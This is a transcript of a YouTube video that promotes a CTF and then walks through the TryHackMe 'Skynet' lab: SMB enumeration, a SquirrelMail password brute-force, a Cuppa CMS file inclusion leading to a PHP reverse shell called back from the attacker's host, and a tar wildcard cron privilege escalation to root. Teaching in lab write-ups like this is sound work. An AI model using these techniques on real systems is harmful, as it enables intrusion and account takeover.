 Next Tuesday, Guidepoint Security is hosting yet another capture the flag event all online, totally free. Anyone can access the game and play and you absolutely should be there. I wanna see you on the scoreboard. So the game starts February 16th, next Tuesday at 8 a.m. Eastern time and it runs a whole week. It'll close on Monday, February 22nd at 5 p.m. Eastern time. The first person to solve all the challenges or to whoever gets the most points will win and take home a $100 gift card. There is one thing that I would like to emphasize though and that this capture the flag event is different than the previous ones that Guidepoint Security has put on. Yes, the challenges will range from beginner to advanced and difficulty but this time there will not be any walkthroughs for the challenges. Still have to do some critical thinking and problem solving the way that you always do as a real hacker. You can register online with the link in the description and once you're set you'll be emailed your secret passphrase to be able to log into the game, access to the VPN and you'll be off the races once next Tuesday, February 16th comes along. So I'm super excited for the game. Guidepoint Security has put out an incredible set of capture the flag events recently and I'm really looking forward to this one. I hope to see you on the scoreboard. In this video, I wanna take a look at the SkyNet room from TriHackMe. I am logged in on their website connected to the VPN and I have the room open up in my web browser here. You can see the description is a vulnerable terminator themed Linux machine. So I have joined the room and deployed the machine. I have the IP address ready here for us and we can go ahead and start to poke at this machine. I will hop over to my terminal where all the good stuff happens and I'll make a directory for SkyNet YouTube and inside of that directory I'll also make an end map folder so we can kind of store our end map scans and that logging in its own kind of custom designated location. So I'll go ahead and run end map to scan the box. I'll use tack v for verbose so that way I can see all the discovered ports as end map finds them. I'll use tack sc for default scripts, tack sv to enumerate versions, tack o capital N to output in an end map format. I'll throw it in that end map directory that I just created with the initial file name and I'll slap in the IP address or just paste that there. Now when we go ahead and run this we should see this end map running off to the races. Looks like it discovered port 445, port 139, 110, 80, 143 and port 22. Okay, so we already have a lot of good stuff to work with. I'll wait for this end map scan to finish which it just did. So I will go ahead and open up that end map scan results. We do of course see that port 22 for SSH. It is in fact a new Buntu Linux machine that we are up against. Looks like it's running Apache for the web server on that port 80 here and I can see references to Skynet repeatedly. Looks like that is the host name or the computer name of this box and it has seemingly a mail service up and running for that pop three Dovecott on port 110 there. Of course there is SMB open on port 445 so that might have some interesting shares we could look through but at this point I think we have enough to go off if we could go ahead and enumerate those web services as well as the SMB or Somba share because we won't have credentials off the bat to log in via SSH but we can go ahead and explore. So I will go ahead and start a Nikto scan along with a Go Buster scan to kind of have some enumeration going on in the background for us and I'll get started with a Go Buster scan in DIR or DIR mode with a URL specified with TACU. I'll paste in that IP address and I'll use the TACW argument to specify a word list. I will use the directory list lowercase 2.3 medium which is the default that comes with DIR Buster. So if I let that span, I should be able to go explore this manually on my own. I'll hop over to that IP address in my web browser and it looks like I'm greeted with sort of like a Skynet search engine. Looks a little bit like Google but I don't seem to go anywhere when I search anything or click any of the buttons, I'll hit control U to view the source in my web browser. You could have right clicked and selected view source but there's nothing really interesting here. Looks like this is just kind of flat HTML. I see just a CSS style sheet but of course that's gonna be static, nothing particularly useful or interesting there. So I don't know where more we could go off of with just that. It looks like we did have some interesting results from our Go Buster scan. I see slash admin slash CSS, JS config and AI. We can explore some of those. I'll go to slash admin but that looked like it got a 301 so it looks like I won't be able to access those things. CSS, same thing, JS, same thing, AI, same thing. So not a lot of headway in that direction. We should keep in mind though that we focus specifically on the HTTP service right now on port 80. There was however another port open and that was SMB. So we could explore that a little bit. Let me move down and explore with Enum for Linux. So Enum for Linux is gonna end up working like a great job to scan for SMB services. You could use something like or SMB share, sorry. You could use SMB map. You could use plenty of other tools. I like to use Enum for Linux as just kind of habit. I'll specify tack A to look for all tests or as many as it could. That's kind of just boilerplate habit at this point but I will slap in that IP address and I will also tee that out to an Enum for Linux log and I will let that cruise through and see if it can find anything interesting. Looks like it does see this Skynet target and it is a Unix server here running with Samba. Looks like it did find some shares, okay. It found print dollar sign and IPC dollar sign. Those are kind of boilerplate. You'll see those commonly. However, this Anonymous one and Miles Dyson are totally Adelaide field. Those are new and unexpected. So it looks like that is a Skynet, Anonymous share and a Miles Dyson personal share, okay. So that gives us some headway and it looks like now it's going to try enumerate users but we can start to poke at and explore these SMB shares. So you could do this kind of with your file browser. If you're using Nautilus or Thunar or whatever you could control L to get into the location bar and then type in like SMB colon slash slash to represent that SMB protocol and then you can access shares like just through your graphical user interface in your file browser. That would be fun. That would be cool. I won't do that. I will showcase the other rendition where we're just using SMB client. Ooh, actually looking back at our GoBuster scan I see that it found Squirrel Mail which is a new location that might be worthwhile for us to check out before we go look at those SMB shares. Looks like it is Squirrel Mail version 1.4.23 by the Squirrel Mail project team, okay. I am just going to open up another terminal and try and run SearchSploit on Squirrel Mail to see if it actually gets anything interesting or worthwhile from that version number. Okay, it looks like less than 1.4.22 there is remote code execution but we are on 1.4.23. So that probably won't get us a lot further. So we don't know a username and password here but we know Miles Dyson potentially might be a user. That's kind of a weird like share drive name but let's go ahead and just enumerate those shares, right? I'll go ahead and use SMB client. That anonymous share is very likely going to be something that we can access anonymously without credentials. Miles Dyson, if that's a personal share maybe that would require Miles Dyson's password but we can kind of go verify that and try that. So I will use SMB client with the IP address here and I'll specify the anonymous share. That doesn't seemingly have enough backslash characters. It's probably going to be interpreted as escape sequences. So I will wrap that in those single quotes. There we go. Now Bash would interpret it properly, right? It's gonna ask for my like workgroup slash John John being my username and password. That's totally fine. We're gonna try and log in anonymously. So I'll just hit enter here and it looks like it did connect. So if I were to LS or kind of like look around just list stuff in the current directory looks like I have an attention.text and a logs directory. So I will get that attention.text. There we go, that pulled that down and I'll move into that logs directory and also see what we have here. Log one, two, three. Okay, it looks like log one is the only thing with actual contents. Looks like everything else has a size of zero. So I'm just gonna get log one.text and that pulled that down, great. So now I can seemingly exit because there's nothing else in this share for me to look at these periods and parent directory to period just kind of refer to other folders but there's nothing else that I could really explore there. So let's go ahead and exit out of that and now let's cat that attention.text that we pulled down. It says a recent system malfunction has caused various passwords to be changed. All Skynet employees are required to change their password after seeing this. Roger, what about that log one.text? Oh, what the heck is this? That looks like potential passwords or like a password list, right? Random numbers at the end here all with kind of a Terminator Skynet theme, okay. Are these going to be passwords that we could maybe use to get into squirrel mail? Oh, thank you last pass. No, you don't need to save that password. Let's go back to the login page and we could try like a username Myles or Myles Dyson. Let's try, just grab this top one here. Myles, spit that in, loading. Okay, squirrel mail takes forever, which is surprising considering the name. Okay, nope, that failed. Last pass is off the races again. Let me try that Myles Dyson, spit that in. Oh, okay, that got it. So we kind of got lucky and then it was just the very, very first password. Truthfully, I would have written something to like brute force this. I will just mentally run through that if that's okay with you because I think it will just go to show really what's happening here. So whenever you have a form like this that you kind of want to brute force, yeah, you could do it with Hydra. I know a lot of people will probably give me hate because I don't like to deal with Hydra. The syntax makes my head hurt. I would just kind of whip this out in Python and that's maybe a fault of mine, but I can see that, okay, it takes a password as the input type, obviously. It takes a name and login name kind of as a password here or excuse me, as another input field and it submits it all to a form with redirect.php. So what I would do, honestly, rather than looking at that HTML code is I would just open up the developer tools. So I'll hit F12 and then I'll type in like name and password for these fields. There we go. And then this page here after Chrome goes crazy. Yeah, I know that's a bad password Chrome. This redirect.php like post request that's sent. You could go ahead and right click on that and just say, hey, copy as curl and then check this out. There is a curl to Python requests utility that does a really good job of just, okay, grabbing that syntax and then making it the Python code that you might want to use. Grabbing the cookie, grabbing the session information, grabbing the same header as the content type, user agent, et cetera, et cetera, et cetera. So that is kind of handy for what you're up against. I'll go ahead and mess with that now. Now that we have this log1.txt file, we can try like a squirrel mail brooder with a u.py. And I will just crank out user bin environment Python three. We'll have a URL. Actually, we'll just go ahead and slap in all this. We'll import requests and we will create a response object after we post to that page with the headers, the cookies, the data, et cetera, et cetera. We will need to however tweak the data because we're not just going to want to send it this static password every time. We're going to end up wanting to change the name and password as to what we're looking with. So I'll go ahead and import, I'll grab it from pprint. So I have pretty print from pprint import pprint. And let's go ahead and open that log1.txt. And I'll read everything out of it. This is super duper dirty, but I would just kind of do like a, oh, passwords is going to equal the contents of that, split on new lines, and then I'll like make it a list comprehension so I can do like x.strip for every x in that thing if there is an x there. So that way I split on new lines and absolutely make sure there are not going to be any new line characters in the contents because I've stripped them all out. And if it's an empty string, if it wasn't properly able to get a line or there was no line there, it will just go ahead and remove it with that if x. So at that point, if I were to pprint passwords, we should see all that spit out with all of our lines there. We just created a simple list grabbing everything from that and now we can work through that. So we know our username should be Myles Dyson and we could have finagled that with like Myles or Dyson or M Dyson or however you wanted to. But then we'll go ahead and loop for password in passwords. We can indent all this, go ahead and grab the response object but we'll need to change our name to our username and our password to be the variable password as that changes every time. So at that point, I'd probably wanna check like, hey, the return code. Is this actually going to give me a response status code that tells me I redirected or successfully logged in? We can try to see how that looks but I think we'll come to find out that Squirrel Mail is doing kind of weird things and that, okay, it's gonna give us a 200 every time whether or not we have the right password or not. So that's not all that helpful. Again, admittedly, this is also very, very slow. So if we wanted to really weaponize this we could probably make it threaded and maybe not have to deal with all the time it takes for Squirrel Mail to get through each of those responses. Anyway, let's go ahead and just grab the response.text and we knew when we failed to log in earlier it gives us this unknown user or password incorrect error. So I'll just go ahead and look for that string. I'll just do a simple like if unknown user or password incorrect in response.text then we know, okay, it's a bad password. So we can actually test if it's not in there. And then if that's the case, we'll go ahead and print out the password that we found and like, hey, we found it or something. Potential password found. And like, that's all we need to do. Now, obviously, because we know, oh, it's the first password because we sort of went through that manually and we just got lucky. Sure, that would really not be that helpful for us because it spits it out immediately. But if we were doing something else and it was furthered along in that word list, you could have a display out over trying this password and then, okay, we finally found this one eventually. So you could run that in the background if you wanted to. But that was it. Sorry for that fire hose tangent, but that was how I would spit ball just slapping that together in Python. Anyway, let's get back to our good friend Squirrel Mail. We will grab that correct password to log in and we'll hop over to Miles Dyson, pasting in that password there. Okay, now let's be creepy and read his emails. So he has a from Skynet at Skynet. Looks like it's a Samba password reset. Ooh, we've changed your SMB password after the system malfunction. And now we have this password that you could use. Okay, so we wanna use that maybe for his SMB share password. And then there's binary and this other thing. I'm just gonna be cheap and go to askyoutohex.com to try and see what that decodes out to. This is when you know you're legit. This is when you know you're a real hacker when you're using askyoutohex.com. Balls have zero to me, to me, to me. What? I have no idea what that is or what that's referring to. I don't know what I can, I, I, everything else. Is this like the system malfunction? Is this some terminator reference that I don't know? That's probably it. I actually haven't seen the terminator movies. Don't hate me. I'm not a real nerd. Okay, now that we have Miles Dyson's SMB password, we can go try and connect to that SMB share. We could have tried to log in anonymously earlier and maybe that would have got us somewhere. I'll use that SMB clients to this IP address. I'll slap that in. You got your stinkin' HTTP schema. I don't want that. Miles Dyson was the name, but if I just try and hit enter here, okay, yeah. We would have needed a password for that. Let's grab that. And if I try to connect with this, obviously it's thinking that I'm the work group John user, but no, I want to go ahead and be Miles Dyson. So we'll specify that as a user with that capital U. Now trying that, I don't know if that'll let me in without specifying, oh, the host name. Okay, looks like it just did. You could very well have just entered like Skynet forward slash. And that will specify the host name or a domain name if you're using like a domain user at some point. So then just slapping in that password, pacing it in. Now we are connected and it looks like we have some stuff to look at. Oh, there's a lot here. Can I make that relatively visible without obscuring what's actually happening? No, I see a lot of PDF files. And I don't know if those will be all that useful. It's like improving deep neural networks. So good luck. Natural language processing, building sequence, neural networks, et cetera. That doesn't seem all that useful. There is a directory notes though. Let's hop into notes. Ooh, and now there's more markdown files. These all look like, like a genuinely, literally a person's notes, like when they're studying for a test or something or for some course foundations, not only your dynamics. Just a bunch of markdown files. Oh, there's an important dot text. Ah, okay. Let's get that important dot text if that is seemingly important. And we can try, can I am get all these things? Yes, yes. Oh, do I have to enter Y the entire time? I genuinely don't need all these things. I'm gonna remove all those markdown files. Okay. Now we have important dot text. So let's see what's in that. Add features to beta CMS slash four, five, KRA24Z7, blah, blah, blah. That might very well be a web location or like part of a URL. I can kind of, I think so by that forward slash. Work on T80 model 101 blueprints and spend more time with my wife. Yeah, that makes sense. That math checks out. Let's see if we can access that as like a location. We can. Okay, Miles Dyson personal page. Dr. Miles Bennett Dyson was the original inventor of the neural net processor. Let me, let me, is there any links on this page? No. Okay, let's try and go buster that. I already have many, many terminals open. So let's run that same go buster with that location there. Just slapping in that path and let's run that one more time. We'll see if it gets anything interesting and then I'll keep poking around. Miles.jpg is just the picture. I don't think there'll be any like wacky steganography in that. But there's nothing else on this page. We could try like slash admin. No. Any CSS? No. Backups? No. Is there like a dot get directory or robots.txt for some weird reason? No. And go buster hasn't found anything. So what is that? Just a dead end. Did I just like find this for no reason? What do I do with this hidden page? Ooh, ooh, ooh, ooh, administrator. Okay. Let's get to administrator. Kappa CMS, use a valid username and password to gain access to the administrator. I don't wanna print that, sorry. Can I use the same credentials I had earlier? I don't think I had that saved. What was that password? Oh, I mean, we could use the one from the squirrel mail email. No. Whatever. Is this thing just like inherently vulnerable to anything? What is Kappa CMS? We could Google that, but I'll just check search sploit super quickly. So search sploit. Kappa. Ooh. Kappa CMS alert config field.php local remote file inclusion. Ooh, remote file inclusion. And it looks like it's just that thing. So let's search sploit tack M to get that in our current directory. Good. And now let's go ahead and sublime that to see what this thing is. Kappa CMS file inclusion back on 2013. This is PHP code injection. What? PHP include request URL config. An attacker might include local or remote PHP files to read non-PHP files or read non-PHP files with this vulnerability. Oh, wait. PHP code in this file will be evaluated. Non-PHP code will be embedded to the output. So it can just run PHP code. Well, that'll get us server side, like code execution, right? So all you need to do is seemingly do some like climbing the file system tree and then we end up reading its set repassword or like a location that we want. Oh, and you could do some PHP streams to get like a base 64 encoder representation. Oh, that's slick. Okay. So let's grab this. And I'm gonna throw it in another directory here because I know that we're going to need to grab the actual location of this thing. This administrator that should go to alerts alert config field. So this is the string that we want, right? With our appropriate IP address, our location for Kappa and trying to read its set repassword as little proof of concept. So let's curl that and let's see if we get anything juicy. Ooh, we do. Okay. So we just flat out read. Set repassword dope. We could read the configuration file or we could see if it actually will run PHP code. If we're using remote file inclusion, then we could just like change this to call back to us. So if I were to, what is, if I were to like try and set up my own web server and connect back to it, I could see if that will work. What is my IP address? AP, I guess 10 zero, it's this thing. 10.6.5685. So we'll slap that in. I'll listen on port like 8,000 and then I guess we'll just go for like a pock. And I should actually make that a PHP script. So let's make a directory dub, dub, dub. And now let's subble like a pock.php. We'll just include PHP tags here and then run like a system function. So I can see if I can run command execution on that target. I'll run who am I and I'll use Python tech mhtp.server to spin that up. And now that that is running over there on the side, oh goodness, we have a lot of terminals open and we really don't need them. We'll host that over there and let's see if I would run that curl command to go back to my location. Will it download that? Oh, I need to actually include the curl command. That would help. So it's gonna call back to my machine where I'm using Python to host http.server. So on port 8,000, I'm hosting a little web service and it can grab poc.php. And then theoretically, ooh, it will hit it, which it did and it would run the who am I command and we can see the output of dub, dub, dub data. So we do in fact have code execution. Okay, awesome. So let's now try to get a reversal because if we have server side code execution we can kind of control that machine. So let me, I'll just do like a simple netcat on quad eight and I will copy over the PHP reverse shell code. If you don't happen to have that lying around the PHP reverse shell code is something you can find on pentasmunkey.net. I've heard complaints that like Pentasmunkey was down earlier, oh goodness, can I just go to the site please? Oh no. Okay, that's being weird. PHP reverse shell. Okay, they have it here on GitHub. There you go. PHP reverse shell dot PHP. And this is the exact same code. All you need to do is change the IP address and port to your IP address. So I will grab again my IP address, slap that in there and quad eight is where I'm gonna have my netcat listener running. Good. So at that point, I should be able to just have it request rather than the pock dot PHP. We'll go ahead and grab that PHP reverse shell dot PHP. And then back in my terminal, I should be able to curl that location and it will invoke the PHP on the target that will call back to me theoretically. Oh, oh, oh, I didn't even have the server running. That would be why. It didn't call back and I was like weirded out because I didn't actually start the HTTP service that was hosting that PHP reverse shell. So let's run that now. Make sure our listener is up and running and we will go ahead and curl that. There we go. Saw the request in our HTTP server and have our shell callback. Okay. Let me go ahead and stabilize the shell. So I'll use, do I have Python actually? Let me, which Python? I do. All right, Python, taxi, import, PTY, PTY dot spawn. Pin bash. I should be using Ponecat for this in all honesty. STTY raw minus echo. Gosh, I haven't typed these commands in so long because I just, you've been using Ponecat. We'll export term to X term. There we go. Okay. Now we have a full shell. Ponecat is in a little bit of a development phase. We're testing new things. So I'm not using that for the moment because people are gonna be angry. Like how come it works on your computer and not on mine? So let's go into the home directory and see what we got here. We got Miles Dyson. We did land as the www data user though which isn't extremely helpful because we probably need to privilege escalate to do something better. But we wanna see if we can grab this user dot text flag or prove that we have like local command access. So let's change directory into that Miles Dyson friend here and he does have a user dot text in here. Can I read that? It is world readable. Okay. So let's just simply cat out that user dot text and there we go. We have that flag to submit. Now we sort of need to be able to privilege escalate and see what we can do to become root or this Miles Dyson user. Can I pseudo attack L? Nope. I need a password which I don't have. Let's just try and run Limpies. So I will hop over to my shared memory directory or dev shm and I am going to actually use this Python web server a little bit more but I'm just gonna copy over Limpies and put it in the same directory so that way it's still currently being served. That way I can go ahead and W get a HTTP colon slash slash of that IP address and port number for my machine and we'll go ahead and grab that Limpies.sh. Take some time to download that. Good. Now it's on the target. I can go ahead and run it and let's see if that gets any good stuff. Limpies is cruising. We'll take a break. We'll take a quick drink break to let that finish and we can start to kind of look through some of this output. Limpies is super good though because it will give us that legend or color key as to the things that are very likely a privilege escalation vector and we can start to cruise through here. Kernel version Ubuntu 16.04, old version of Pseudo. Ooh, CVE-2021-3156, am I right? Processor information and things. A lot of useful software there. We have GCC. Also have LXC, that's kind of weird for containers. A lot of processes running. Nothing extremely interesting with that for the moment. Cron jobs. Oh, there is a root Cron job. Cron hourly, Cron monthly, Cron weekly. Ooh, and there's an entry in here. Oh, every minute, root runs home miles Dyson backups backup.sh. Oh, that was in the directory and I didn't even pay attention to it. I didn't even see the thing. Well, that's gotta be useful, right? All right, let's stop Limpies and let's just go look at that home miles Dyson backups. Backups, LSTecLA. I didn't even look in share mail and backups. I was just cruising right through it. Oh yeah, backups is owned by root, that's kind of weird. It is world readable and executable though, so we can go ahead in there. It also has a backup.sagescript, which we just saw from that Cron job running every minute. Root is gonna run this script and a backup.tgz. I cannot modify that file because it's owned by root and it doesn't have right permission for me, but we can read that backup.sagescript Limpies, go away. So we'll cat that out. Looks like it just starts a bash script, right? That's all it is. And it changes directory into var www.html. So the web service and it tars, it creates a tar archive outputting to, oh, this backup.tgz every minute we saw from that Cron job and it uses an asterisk here. Ooh, that backup.tgz was created just today. So that time is different than all the others, right? So we know that that's actively being used, that Cron job is working. So with that syntax of this cat, with this backup.sagescript here that we cat it out, var www.html has all the files that are being included in this backup.tgz and it's tearing it all with a wild card. So maybe this comes from like the familiarity and just, I don't know, the exposure or some of the stuff because I play a lot of these silly games and try to get internet points that aren't real, but the asterisk and the wild card using the command line can be abused. So in var www.html, it's gonna be globbing all those files because of that asterisk, but we might be able to make that messy because we could inject quote unquote or put in place some command line arguments for the tar program. And tar can be used as a GTFO bin or some like living off the land native binary to UNIX and Linux that will escalate our privileges or do something interesting. So that's a known thing and a known technique and I'll Google that and show you that if you do tar wild card exploit. Yeah, yeah, yeah. Exploding wild card for a privilege escalation right here and I'll show you a little bit of kind of what this discusses. We'll cover wild card injection, talking a little bit about it here, wild cards, asterisk, question mark, brackets can be used as well. So here they show this example, right? They create some directories. We create a file here, file one and file two and we also name a file, tack tack help. It's weird, but we're naming a file. That file has the file name tack tack help. So when you try and cat those out, you're the same way you would as if the wild card was being interpreted. You're gonna cat out file one, you're gonna cat out file two and you're also gonna cat out tack tack help but that tack tack help will be evaluated and interpreted and understood as parameters to the cat command. So you can use this with other programs that are obviously going to end up being much more dangerous than simply cat or the tack tack help argument but he goes through an example where he showcases, oh hey, I have all these files in my current directory but I'm gonna make them be owned by someone else because we know the chown or chown command is gonna be used. They use tack tack reference to indicate, hey, that's actually going to change some all the other files you suggested back to a different file that is already specified. So they're using that my.php example here and that way all of those files previously owned by Raj or RHA are now going to be owned by Ignite because of that tack tack reference file. It used that myphp which was owned by Ignite and that just got sprayed to all the other files. Very cool, very neat, that's the idea but they do showcase a similar example here using tar running every minute in the cron job, running backups with an asterisk file. So that's kind of exactly what's happening. They showcase this example, they're using MSF Venom. We don't need to use MSF Venom because that's gonna take a lot more time and be more clunky than we need to but what they do is that they create a other shell script, can this thing stop? There we go, that was really annoying that it just kept, and that won't even expand. This is stupid, I don't like this thing just popping up and down, here's what we'll do. Can I copy all this maybe? Copy, what? There we go, okay. Now we can actually explain this without fighting over stupid things. Our code, we have bad malicious code or whatever we want to run put into our own shell.sh script and then these arguments or these new files we're creating checkpoint action exec shale.sh. It's going to run this script that we've specified and these checkpoint action arguments are arguments to that tar program and it's gonna actually run them with this checkpoint equals one setup. So then when this tar command is actually executed and we aren't gonna run this manually we don't wanna run this ourselves because that's going to end up like running with the same privileges as our current user of dub dub dub data. We want to let root run this because root is running it every minute because we've set up these files and they're in place in the current directory that wildcard will expand them and it'll interpret them and tar will execute this stuff and that way our malicious shell.sh or whatever file name or code we wanna run it will be executed as root and that is how we can escalate our privileges. So what I will do and you guys know this kind of technique that I love I'm gonna check out bin bash. Bin bash is currently owned by root and it's just a regular binary but I love, I love and this is way too common for me I do this all the time because it's so quick and easy. Don't need to get another reverse shell don't need to spin up MSF venom. I'm gonna have root make bin bash be a set UID binary so that way I can just invoke it and become root as needed. So if I were to run bin bash right now it puts me in a sub shell like it doesn't look like anything changed but if I were to try and exit that's cause I was in a sub shell. When bin bash is a set UID binary if I invoke it with tack P I could run who am I and I would have the privileges of the user that this file is owned by, right? That's what the set UID privilege will allow us to do. Right now it isn't set UID so I'm not root but since we can weaponize and use this tar exploit or this tar wild card expansion do that that's what we'll do. So, all right. So let's simply use printf to get a shebang line in here and I'm gonna use single quotes because I know that this hashtag octothorpe is gonna be a problem for bash. So I'll specify my shebang line and I'll use a new line here and that's why I'm using printf cause I don't like to deal with it in bash or sorry in echo and then we'll go ahead and chmod plus s on bin bash. There we go. And once that is executed every minute we should see that bin bash is gonna be marked as set UID. So that way it will be executable for us and we can run as root. Then we'll go ahead and create all this all these files that are necessary for tar and we will not run this tar command on our own but we'll wait until the clock strikes a new minute and that way we should be able to run bash as needed and do our privilege escalation. So let me check this out in a linear fashion. I'll run LSTACLA bin bash. I'll check the current date and time looks like we have 46 seconds into the minute. So I have eight seconds left. We gotta be quick. We'll spit that in. Oh, actually I was wrong. We can't write currently in this backups directory. Don't forget that backup.sh is running out of CVAR www.html. All these files it's pulling are in that current directory. So we gotta hop over to that directory. Good. Now this directory is gonna be owned by www.data because it's the website directory. So if I were to check the date one last time let's check our bash set UID. It's not set UID, we got 30 seconds. So let's slap in the shell.sh. Let's create that checkpoint action and let's create this checkpoint file. Now if I were to LS, we can see all those exist. I'll check the date. We got 15 seconds left. Let's run another LSTACLA on bin bash to see if we've changed to a set UID binary. We haven't yet. We're still waiting for the minute to come through. So I'll use date one more time now we're totally past the minute and just a hot second LSTACLA bin bash. Now we should be able to see that that is a set UID binary. Perfect, okay. We've done our privilege escalation at this point and we can just invoke bash as root bin slash bash tack P. It's a set UID binary now. So I am in fact root. Very cool, very fun. That was a blast. I like seeing that tar wildcard expansion. So let's move into that root directory and let's grab that root.text. There we go. We can go ahead and submit that. And at that point, we have everything that we needed for this room. We found Miles password. We did that with a little bit of brute force sort of with that squirrel mail. We found the hidden directory by exploring those SMB shares. We saw the remote file inclusion that we could use with that Kappa CMS and that's how we got our PHP injection in. We landed as wwwdata to get kind of low privilege access and command like remote code execution, a shell that gave us our user flag and we just prevessed with that tar wildcard expansion to find the root flag. And that was that. Oh boy, this turned into a super long video. Holy crap, but I hope you had fun. I hope that you had just as much fun as I did. I've been screaming and recording doing this for a little bit way too long. So my voice is kind of falling apart here. But thanks so much for watching everybody. Hey, please do tune into that guide point security CTF. You can see the promo for that at the beginning of this video but I hope you enjoyed this video. I hope you're excited for more because we're gonna do a little bit more. We're gonna keep in coming and please do all those YouTube algorithm things. I'd love to see you subscribe, maybe leave me a comment, maybe like the video. I'm super duper thankful. So thanks so much everybody. That is the end of the video. I'll see you in the next one. I love you. Take care.